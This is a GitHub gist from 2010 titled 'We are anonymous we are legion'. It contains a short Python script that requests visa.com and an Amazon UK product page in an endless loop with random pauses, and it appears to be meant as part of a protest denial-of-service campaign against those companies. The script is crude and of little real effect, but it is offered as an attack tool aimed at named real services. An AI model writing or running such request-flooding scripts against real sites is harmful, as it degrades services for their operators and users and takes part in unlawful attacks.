Skip to content

Instantly share code, notes, and snippets.

@bussiere
Created December 9, 2010 10:33
Show Gist options
  • Save bussiere/734579 to your computer and use it in GitHub Desktop.
Save bussiere/734579 to your computer and use it in GitHub Desktop.
We are anonymous we are legion
import urllib
import time
import random
while True :
urllib.urlopen("http://visa.com/")
urllib.urlopen("http://www.amazon.co.uk/gp/product/B004EEOLIU?ie=UTF8&force-full-site=1")
time.sleep(random.randint(10, 40))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment